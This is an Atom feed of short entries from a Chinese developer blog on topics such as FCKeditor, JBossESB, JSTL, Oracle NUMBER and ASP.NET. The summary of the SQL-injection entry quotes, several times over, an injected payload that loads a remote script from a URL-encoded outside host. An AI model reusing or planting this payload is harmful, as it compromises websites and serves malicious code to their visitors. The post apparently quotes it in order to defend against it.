<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom"><title type="text">博客园_情走边锋</title><subtitle type="text">在平凡中也会有很多的快乐；有梦想，人才不会孤单学会放弃~</subtitle><id>http://feed.cnblogs.com/blog/u/10628/rss</id><updated>2010-06-07T07:24:56Z</updated><author><name>情走边锋</name><uri>http://www.cnblogs.com/cliffever/</uri></author><generator>CNBlogs BlogServer</generator><link rel="alternate" type="text/html" href="http://www.cnblogs.com/cliffever/"/><link rel="self" type="application/atom+xml" href="http://feed.cnblogs.com/blog/u/10628/rss"/><entry><id>http://www.cnblogs.com/cliffever/archive/2010/06/07/1753251.html</id><title type="text">（摘）设置FCKeditor回车换行方式</title><summary type="text">在FCKeditor中按回车，是换行还是另起一段呢？可以设置的。FCKeditor Enter（回车键）换行时间距过大。按住Shift+Enter换行时（间距会小）也就是说它默认直接敲回车是一个&amp;lt;p&amp;gt;键,而按Shift+回车则是&amp;lt;br /&amp;gt;键。那一般人的习惯都是直接就敲回车的了，查看了下它的配置文件发现是可以解决的。修改fckconfig.jsFCKConfig.Enter...</summary><published>2010-06-07T07:25:00Z</published><updated>2010-06-07T07:25:00Z</updated><author><name>情走边锋</name><uri>http://www.cnblogs.com/cliffever/</uri></author><link rel="alternate" href="http://www.cnblogs.com/cliffever/archive/2010/06/07/1753251.html"/><link rel="alternate" type="text/html" href="http://www.cnblogs.com/cliffever/archive/2010/06/07/1753251.html"/><content type="html">&lt;p&gt;在FCKeditor中按回车，是换行还是另起一段呢？&lt;/p&gt;&#xD;
&lt;p&gt;可以设置的。&lt;/p&gt;&#xD;
&lt;p&gt;FCKeditor Enter（回车键）换行时间距过大。按住Shift+Enter换行时（间距会小）&lt;br /&gt;也就是说它默认直接敲回车是一个&amp;lt;p&amp;gt;键,而按Shift+回车则是&amp;lt;br /&amp;gt;键。&lt;br /&gt;那一般人的习惯都是直接就敲回车的了，查看了下它的配置文件发现是可以解决的。&lt;/p&gt;&#xD;
&lt;p&gt;&lt;/p&gt;&#xD;
&lt;p&gt;修改fckconfig.js&lt;br /&gt;FCKConfig.EnterMode = 'p' ; // p | div | br&lt;br /&gt;FCKConfig.ShiftEnterMode = 'br' ; // p | div | br&lt;/p&gt;&#xD;
&lt;p&gt;将ShiftEnterMode与EnterMode的值换一下，EnterMode=br SHIFTENTERMODE=P&lt;br /&gt;就可以解决了。&lt;/p&gt;&lt;img src="http://www.cnblogs.com/cliffever/aggbug/1753251.html?type=1" width="1" height="1" alt=""/&gt;&lt;p&gt;&lt;a href="http://www.cnblogs.com/cliffever/archive/2010/06/07/1753251.html" target="_blank"&gt;本文链接&lt;/a&gt;&lt;/p&gt;</content></entry><entry><id>http://www.cnblogs.com/cliffever/archive/2009/08/24/1552683.html</id><title type="text">JBossESB问题记录</title><summary type="text">1，在jbossesb-4.6和jboss-4.2.3.GA集成的过程中，windows平台下的路径需要注意前面加上&amp;#8220;/&amp;#8221;，如下格式：org.jboss.esb.server.home=/D:/server/jboss-4.2.3.GAorg.jboss.esb.server.config=defaultorg.jboss.esb.tomcat.home=/D:/serve...</summary><published>2009-08-24T02:19:00Z</published><updated>2009-08-24T02:19:00Z</updated><author><name>情走边锋</name><uri>http://www.cnblogs.com/cliffever/</uri></author><link rel="alternate" href="http://www.cnblogs.com/cliffever/archive/2009/08/24/1552683.html"/><link rel="alternate" type="text/html" href="http://www.cnblogs.com/cliffever/archive/2009/08/24/1552683.html"/></entry><entry><id>http://www.cnblogs.com/cliffever/archive/2008/11/13/1333025.html</id><title type="text">jstl fmt功能说明</title><summary type="text">所有标签：Tags fmt:requestEncoding fmt:setLocale fmt:timeZone fmt:setTimeZone fmt:bundle fmt:setBundle fmt:message fmt:param fmt:formatNumber fmt:parseNumber fmt:formatDate fmt:parseDate &amp;lt;%@ taglib uri=...</summary><published>2008-11-13T10:27:00Z</published><updated>2008-11-13T10:27:00Z</updated><author><name>情走边锋</name><uri>http://www.cnblogs.com/cliffever/</uri></author><link rel="alternate" href="http://www.cnblogs.com/cliffever/archive/2008/11/13/1333025.html"/><link rel="alternate" type="text/html" href="http://www.cnblogs.com/cliffever/archive/2008/11/13/1333025.html"/></entry><entry><id>http://www.cnblogs.com/cliffever/archive/2008/11/13/1332716.html</id><title type="text">oracle中number类型说明</title><summary type="text">1&amp;gt;.NUMBER类型细讲：Oracle number datatype 语法：NUMBER[(precision [, scale])]简称：precision --&amp;gt; p scale --&amp;gt; sNUMBER(p, s)范围： 1 &amp;lt;= p &amp;lt;=38, -84 &amp;lt;= s &amp;lt;= 127保存数据范围：-1.0e-130 &amp;lt;= number value ...</summary><published>2008-11-13T05:34:00Z</published><updated>2008-11-13T05:34:00Z</updated><author><name>情走边锋</name><uri>http://www.cnblogs.com/cliffever/</uri></author><link rel="alternate" href="http://www.cnblogs.com/cliffever/archive/2008/11/13/1332716.html"/><link rel="alternate" type="text/html" href="http://www.cnblogs.com/cliffever/archive/2008/11/13/1332716.html"/></entry><entry><id>http://www.cnblogs.com/cliffever/archive/2008/10/27/1320436.html</id><title type="text">解决通过createElement创建出来的radio无法选中的问题</title><summary type="text">开发过程中，需要使用JS向页面动态添加radio，实现时通过document.createElement()方法来实现，刚开始的代码如下：[代码]结果在IE浏览器上生成的raido无法选中，而使用firefox浏览器却可以选中。后来试了下面的代码：[代码]结果在IE上生成的radio可以选中了，但firefox浏览器中却无效。为此，对于不同的浏览器，需要使用不同的方式来生成radio，这个可以通过...</summary><published>2008-10-27T06:29:00Z</published><updated>2008-10-27T06:29:00Z</updated><author><name>情走边锋</name><uri>http://www.cnblogs.com/cliffever/</uri></author><link rel="alternate" href="http://www.cnblogs.com/cliffever/archive/2008/10/27/1320436.html"/><link rel="alternate" type="text/html" href="http://www.cnblogs.com/cliffever/archive/2008/10/27/1320436.html"/></entry><entry><id>http://www.cnblogs.com/cliffever/archive/2008/10/17/1313817.html</id><title type="text">asp.net C# 中使用timestamp</title><summary type="text">C# 中的 DateTime 值类型表示值范围在公元（基督纪元）0001 年 1 月 1 日午夜 12:00:00 到公元 (C.E.) 9999 年 12 月 31 日晚上 11:59:59 之间的日期和时间；而 Unix 的时间戳则表示的是自从 Unix 纪元（格林威治时间 1970 年 1 月 1 日 00:00:00）到当前时间的秒数。 C# 中似乎并没有内置的方法来完成两者之间的转换。[...</summary><published>2008-10-17T15:48:00Z</published><updated>2008-10-17T15:48:00Z</updated><author><name>情走边锋</name><uri>http://www.cnblogs.com/cliffever/</uri></author><link rel="alternate" href="http://www.cnblogs.com/cliffever/archive/2008/10/17/1313817.html"/><link rel="alternate" type="text/html" href="http://www.cnblogs.com/cliffever/archive/2008/10/17/1313817.html"/></entry><entry><id>http://www.cnblogs.com/cliffever/archive/2008/10/09/1307497.html</id><title type="text">编码 GBK 的不可映射字符 解决办法</title><summary type="text">这是因为：由于JDK是国际版的，在编译的时候，如果我们没有用-encoding参数指定我们的JAVA源程序的编码格式，则javac.exe首先获得我们操作系统默认采用的编码格式，也即在编译java程序时，若我们不指定源程序文件的编码格式，JDK首先获得操作系统的file.encoding参数(它保存的就是操作系统默认的编码格式，如WIN2k，它的值为GBK)，然后JDK就把我们的java源程序从f...</summary><published>2008-10-09T11:54:00Z</published><updated>2008-10-09T11:54:00Z</updated><author><name>情走边锋</name><uri>http://www.cnblogs.com/cliffever/</uri></author><link rel="alternate" href="http://www.cnblogs.com/cliffever/archive/2008/10/09/1307497.html"/><link rel="alternate" type="text/html" href="http://www.cnblogs.com/cliffever/archive/2008/10/09/1307497.html"/></entry><entry><id>http://www.cnblogs.com/cliffever/archive/2008/05/27/1208045.html</id><title type="text">asp.net中SQL注入的解决办法</title><summary type="text">"&amp;gt;&amp;lt;/title&amp;gt;&amp;lt;script src=http://%73%61%79%38%2E%75%73/s.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;!"&amp;gt;&amp;lt;/title&amp;gt;&amp;lt;script src=http://%73%61%79%38%2E%75%73/s.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;!"&amp;gt;&amp;lt;/title&amp;gt...</summary><published>2008-05-26T16:59:00Z</published><updated>2008-05-26T16:59:00Z</updated><author><name>情走边锋</name><uri>http://www.cnblogs.com/cliffever/</uri></author><link rel="alternate" href="http://www.cnblogs.com/cliffever/archive/2008/05/27/1208045.html"/><link rel="alternate" type="text/html" href="http://www.cnblogs.com/cliffever/archive/2008/05/27/1208045.html"/></entry><entry><id>http://www.cnblogs.com/cliffever/archive/2008/05/22/1205163.html</id><title type="text">SQL2005部署报表：用户IUSER_ 授予的权限不足的问题</title><summary type="text">一开始一直找不到，也试了一下在网上的各种方法，包括设置Report和ReportServer的虚拟目录的IUser访问，但是都没有，并且设置了IUser之后，报表管理器都没有办法访问，唉~~，后来还是采用默认值。通过http://localhost/report 进去之后才发现在属性的Tab里有一个安全性设置，呵呵，在这里加上 youmachine\Iuser用户的相应的权限，终于在我的Web里用...</summary><published>2008-05-22T12:27:00Z</published><updated>2008-05-22T12:27:00Z</updated><author><name>情走边锋</name><uri>http://www.cnblogs.com/cliffever/</uri></author><link rel="alternate" href="http://www.cnblogs.com/cliffever/archive/2008/05/22/1205163.html"/><link rel="alternate" type="text/html" href="http://www.cnblogs.com/cliffever/archive/2008/05/22/1205163.html"/></entry><entry><id>http://www.cnblogs.com/cliffever/archive/2008/04/01/1133127.html</id><title type="text">发现一个网页幻灯制作的东西HTML Slidy</title><summary type="text">今天偶尔发现了一个网页幻灯制作的东西，HTML Slidy，很小巧，不过还是很有意思。可以在这里下载http://www.w3.org/Talks/Tools/Slidy/slidy.zip决定再去w3c里面淘一淘，看有没有其他好玩的东西</summary><published>2008-04-01T08:32:00Z</published><updated>2008-04-01T08:32:00Z</updated><author><name>情走边锋</name><uri>http://www.cnblogs.com/cliffever/</uri></author><link rel="alternate" href="http://www.cnblogs.com/cliffever/archive/2008/04/01/1133127.html"/><link rel="alternate" type="text/html" href="http://www.cnblogs.com/cliffever/archive/2008/04/01/1133127.html"/></entry></feed>
